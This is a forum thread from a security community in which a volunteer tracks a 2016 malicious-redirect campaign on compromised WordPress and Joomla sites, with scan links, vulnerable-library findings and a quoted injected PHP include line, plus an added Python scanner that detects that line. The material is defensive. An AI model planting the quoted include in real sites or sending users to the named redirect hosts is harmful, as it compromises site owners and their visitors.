Author Topic: Pop-up Ad-campaign with malicious redirects to bokotraffic dot com  (Read 8266 times)


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
This campaign to maliciously redirect comes after a previous one which had as infection leader: zulotraffic dot com.
An example can be found here: http://killmalware.com/nkom-nn.ru/
77 sites have already been infected with redirects to this URL.
Infested websites mainly have Joomla and WordPress as CMS.
Visitors are being redirected to another ad page, sometimes with fraudulent content or offering dubious download software for mobile apps.
Hosting servers and websites alike should be scanned against malicious code.
Info credits SecurityLab.Ru
Also consider: https://urlquery.net/report.php?id=1468432028185

pol
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
Seems redirect site has been taken down now, see: https://quttera.com/detailed_report/toolspeaks.com
as I get a 404 Not Found.

polonus

Offline polonus

This one now also redirects there: http://killmalware.com/alexadsindia.com/#
Re: https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Falexadsindia.com&ref_sel=GSP2&ua_sel=ff&fs=1
And then we see where the content comes from: "Content displayed is from the redirect location, the URL -http://www.terraclicks.com/watch?key=9ee25727d68b023a1c9301c6efa25720". AOS does not flag this destination, but should, while WOT has it blocked!
Because of Popups, tracking systems, browser exploits, ads, banners, privacy risks.
Pop-up malvertising: http://malvertising.stopmalwares.com/2015/02/highcpms_vipcpms-com/
AVG has Generic.8C0, and avast?
Hope avast detects in PUP mode, read: http://malvertising.stopmalwares.com/category/bad-ads-network/

polonus (volunteer website security analyst and website error-hunter)

Offline polonus

Re: Pop-up Ad-campaign with malicious redirects to bokotraffic dot com
« Reply #3 on: August 03, 2016, 12:02:34 AM »
Update recent redirects - current list: http://evuln.com/labs/redirect/bokotraffic.com/
and what we see is a full parade of WordPress and Joomla CMS driven websites.

polonus

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
Re: Pop-up Ad-campaign with malicious redirects to bokotraffic dot com
« Reply #4 on: August 12, 2016, 09:16:37 PM »
Update and a recent one here: http://killmalware.com/smpsindore.in/
GoDaddy abuse, see: http://toolbar.netcraft.com/site_report?url=http://www.smpsindore.in
Here we see it happen: https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fsmpsindore.in&ref_sel=GSP2&ua_sel=ff&fs=1
This is a Pr0n scam redirect - https://aw-snap.info/file-viewer/?tgt=http://smpsindore.in&ref_sel=none&ua_sel=gbot2&fs=0
(Folks who abhor explicit pr0n spam words should not open the last given link!) It is connected with a WordPress theme hack via twentysixteen-fonts-css.
See vuln.: -https://wp-themes.com/
Detected libraries:
jquery-migrate - 1.4.1 : -https://wp-themes.com/wp/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
jquery - 1.12.4 : (active1) -https://wp-themes.com/wp/wp-includes/js/jquery/jquery.js?ver=1.12.4
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
(active) - the library was also found to be active by running code
1 vulnerable library detected

polonus (volunteer website security analyst and website error-hunter)


Offline polonus

Re: Pop-up Ad-campaign with malicious redirects to bokotraffic dot com
« Reply #6 on: September 02, 2016, 12:55:37 AM »
Has not been sinkholed yet: http://killmalware.com/awakenedspirityoga.com/
130 sites affected -> http://evuln.com/labs/redirect/bokotraffic.com/
urlquery.net flags:
1 : -   bokotraffic.com/in.cgi?2&seoref=http://www.google.com/url?sa=t&rct=j&q=&a (...)
2 : -bokotraffic.com/in.cgi?2&seoref=https%3A%2F%2Fwww.google.com%2F&parameter=eng (...)

polonus


Offline polonus

Re: Pop-up Ad-campaign with malicious redirects to bokotraffic dot com
« Reply #8 on: October 23, 2016, 12:31:15 AM »
Another recent update found that campaign still going on: http://killmalware.com/redorangeid.nl/#
See:-http://redorangeid.nl
Detected libraries:
jquery-migrate - 1.4.1 : -http://redorangeid.nl/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
jquery.prettyPhoto - 3.1.5 : (active1) -http://redorangeid.nl/wp-content/themes/jarvis_wp/js/jquery.prettyPhoto.js?ver=4.6.1
Info: Severity: high
https://github.com/scaron/prettyphoto/issues/149
https://blog.anantshri.info/forgotten_disclosure_dom_xss_prettyphoto
jquery - 1.12.4 : (active1) -http://redorangeid.nl/wp-includes/js/jquery/jquery.js?ver=1.12.4
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
(active) - the library was also found to be active by running code
2 vulnerable libraries detected

WP issues: Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.

ID   User   Login
1   roid   roid
2      None
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

Warning Directory Indexing Enabled
In the test we attempted to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is an information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.

/wp-content/uploads/ enabled
/wp-content/plugins/ disabled
Directory indexing was tested on the /wp-content/uploads/ and /wp-content/plugins/ directories. Note that other directories may have this web server feature enabled, so ensure you check other folders in your installation. It is good practice to ensure directory indexing is disabled for your full WordPress installation either through the web server configuration or .htaccess.

polonus

Offline polonus

Re: Pop-up Ad-campaign with malicious redirects to bokotraffic dot com
« Reply #9 on: November 01, 2016, 02:55:53 PM »
Update - the campaign seems to be continuing: SE visitor redirects.
Visitors from search engines are redirected
to: -http://bokotraffic.com/2.html?seoref=http%3a%2f%2fwww.google.com%2furl%3fsa%3dt%26rct%3dj%26q%3dcityofathensalrecklessdrivingattorney.com%26source%3dweb%26cd%3d1%26ved%3d0cdeqfjag%26url%3dhttp%3a%252f%252fcityofathensalrecklessdrivingattorney.com%252f%26ei%3dwc7yt5qcjbcckqktnwe%26usg%3dafqjcngeeyp3d7uunlajxmivlilyq9o_pg&parameter=cityofathensalrecklessdrivingattorney.com&se=$se&ur=1&http_referer=http%3a%2f%2fcityofathensalrecklessdrivingattorney.com%2f
456 sites infected with redirects to this URL

See where it is not flagged: http://fetch.scritch.org/%2Bfetch/?url=http%3A%2F%2Fcityofathensalrecklessdrivingattorney.com%2F&useragent=Fetch+useragent&accept_encoding=

as
Quote
error_reporting(0);ini_set("display_errors", 0);include_once(sys_get_temp_dir()."/SESS_48cd7517d21176f980daa5502d9efb31"); ?>

And where it comes fully analyzed: https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fcityofathensalrecklessdrivingattorney.com%2F&ref_sel=GSP2&ua_sel=ff&fs=1

Coming up with a GoogleBot spam check:
Quote
Content that was returned by your request for the URL: htxp://cityofathensalrecklessdrivingattorney.com/
Note: Content displayed is from the redirect location, the URL htxp://www.clicksgear.com/watch?key=42392c8156ae1fda90c4564b011032fc

1:  < a href = 'htxp://terraclicks.com/anonymous/' target='_blank'> Anonymous Proxy detected, click here.< /a>

polonus
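
The quoted PHP prologue above (error output silenced, then an include of a SESS_* file from the system temp directory) is the hook that serves the search-engine redirect. Below is an added file-scanning example, not code from this thread or from any of the linked tools, that looks for exactly that prologue in a WordPress or Joomla tree; the sample source texts and the 32-hex session-file name in them are constructed placeholders, not the value quoted in the post.

```python
"""Scan a WordPress/Joomla tree for the injected PHP prologue seen in this thread."""
import os
import re

# Pattern of the quoted snippet: include_once(sys_get_temp_dir()."/SESS_<32 hex chars>")
# The included file lives outside the web root, so a web-root-only scan misses the logic.
TEMP_INCLUDE_RE = re.compile(
    r'include(?:_once)?\s*\(\s*sys_get_temp_dir\s*\(\s*\)\s*\.\s*'
    r'["\']/SESS_[0-9a-f]{32}["\']\s*\)',
    re.IGNORECASE,
)
# Error suppression at the very start of a file is the second tell-tale of this injection.
SILENCE_RE = re.compile(
    r'error_reporting\s*\(\s*0\s*\)\s*;\s*ini_set\s*\(\s*["\']display_errors["\']\s*,\s*["\']?0["\']?\s*\)'
)


def scan_php_source(source: str) -> list:
    """Return finding labels for one PHP source text (empty list if nothing matched)."""
    findings = []
    if TEMP_INCLUDE_RE.search(source):
        findings.append("include of SESS_* file from sys_get_temp_dir()")
    if SILENCE_RE.search(source[:300]):  # only the file prologue is of interest
        findings.append("error output silenced in file prologue")
    return findings


def scan_tree(root: str) -> dict:
    """Walk a directory and map each suspicious .php path to its findings."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    findings = scan_php_source(fh.read())
            except OSError:
                continue
            if findings:
                hits[path] = findings
    return hits


# Constructed samples (not taken from the page); the hash below is a placeholder.
INJECTED_SAMPLE = (
    '<?php error_reporting(0);ini_set("display_errors", 0);'
    'include_once(sys_get_temp_dir()."/SESS_' + "0123456789abcdef" * 2 + '"); ?>\n'
    "<?php get_header(); ?>\n"
)
CLEAN_SAMPLE = "<?php\nget_header();\n"

if __name__ == "__main__":
    print(scan_php_source(INJECTED_SAMPLE))  # two findings
    print(scan_php_source(CLEAN_SAMPLE))     # []
```

Run `scan_tree("/path/to/webroot")` on a copy of the site; any hit should be paired with a look at the named file in the server's temp directory, which is where the redirect code itself sits.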


Offline polonus

Re: Pop-up Ad-campaign with malicious redirects to bokotraffic dot com
« Reply #11 on: November 17, 2016, 12:20:42 AM »
Update: This redirect campaign is still ongoing with 502 sites infected with redirects to this URL.
Example: http://killmalware.com/ocfloorstop.com/#
abuse at godaddy -> https://www.threatcrowd.org/ip.php?ip=23.229.219.69
and http://webyzer.net/ip/23.229.219.69
malware at htxp://crcgroup.gr/ might have been cleansed, but the website has outdated WordPress.
User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.

ID   User   Login
1   None   manager
2      None
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

2 vuln jQuery libraries detected: http://retire.insecurity.today/#!/scan/587440658b903464c5ca8b773abd1250ad01a7d63afda495b5313b5ed1e57a05

F-X-F-status: https://observatory.mozilla.org/analyze.html?host=crcgroup.gr

polonus

Offline polonus

Re: Pop-up Ad-campaign with malicious redirects to bokotraffic dot com
« Reply #12 on: December 01, 2016, 09:02:08 AM »
Update:

Still ongoing Spam campaign. Site cleansed from it but now unreachable - 500 error: http://killmalware.com/toddmoreschiplumbing.com/#
and https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Ftoddmoreschiplumbing.com&ref_sel=GSP2&ua_sel=ff&fs=1
IDS alerts for "ET INFO PDF Using CCITTFax Filter" -> http://95.34.115.158/report.php?id=1479022907761

polonus

Offline polonus

Re: Pop-up Ad-campaign with malicious redirects to bokotraffic dot com
« Reply #13 on: December 03, 2016, 12:34:49 AM »
Update: the bokotraffic redirect campaign is still ongoing and now also infects with terraclicks dot com malcode here:
-https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fdspfinc.com%2F&ref_sel=GSP2&ua_sel=ff&fs=1
See: http://killmalware.com/dspfinc.com/
See the terraclicks description report here: https://www.bleepingcomputer.com/forums/t/604640/current-method-to-get-rid-of-terraclick/

pol